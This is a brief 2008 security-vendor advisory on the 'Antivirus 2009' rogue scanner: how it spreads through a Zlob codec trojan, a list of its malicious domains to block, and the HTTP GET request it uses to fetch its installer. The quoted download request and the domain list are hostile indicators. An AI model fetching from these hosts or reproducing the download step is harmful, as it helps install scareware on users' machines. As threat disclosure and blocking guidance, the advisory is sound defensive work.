Fake anti-spyware Antivirus 2009

July 30, 2008

July 18, 2008

A public beta of Norton Antivirus 2009 opened this week and the scammers didn't wait long to follow suit with a new bogus scanner: Antivirus 2009.

Antivirus 2009, also known as Antivirus2009, is a rogue anti-spyware program that uses false spyware results to lure you to purchase its full version. Antivirus2009 is an updated version of Antivirus 2008.

Antivirus 2009 is usually promoted via a ZLOB/MediaAccess Codec installer found on adult websites. Zlob has been the trojan of choice to infect users with pop ups disguised as system notifications that lead to websites with rogue anti-spyware programs. You can also install Antivirus 2009 manually on the rogue websites:

More related URLs:

  • Antivirus-2009.com
  • antivirus-scanner.com
  • antivirus2009professional.com
  • antispyware2008purchase.com
  • virusremover2008.com
  • antivirus2009-freescan.com
  • antivirus2009-scanner.com
  • totalantivirusonline.com
  • virus9-webscanner.com
  • windows-scanner.com
  • virus9-webscanner.com
  • xponlinescanner9.com
  • freewebscanner.com

screenshot

We recomend blocking the above domains by editing your local hosts file to redirect them to 127.0.0.1

When clicking on SCAN or CHECK YOUR PC, a "AV2009Install_0011.exe" file is pushed on to your system. It's usually run-time compressed with UPX or PolyCrypt packer. We have received at least 140 different variants of this threat.

When run it issues a GET HTTP request as follows: 

 GET /download/av2009b.exe HTTP/1.1              Host: antivirus-2009.com

screenshot

Then the fake antimalware product is installed and starts giving fake results and making the system unusable until a full version is purchased.

screenshot

screenshot

screenshot

SonicWALL is blocking this threat with GAV: XPAntivirus_12 (Adware) and GAV: Fakealert.TY (Trojan) signatures.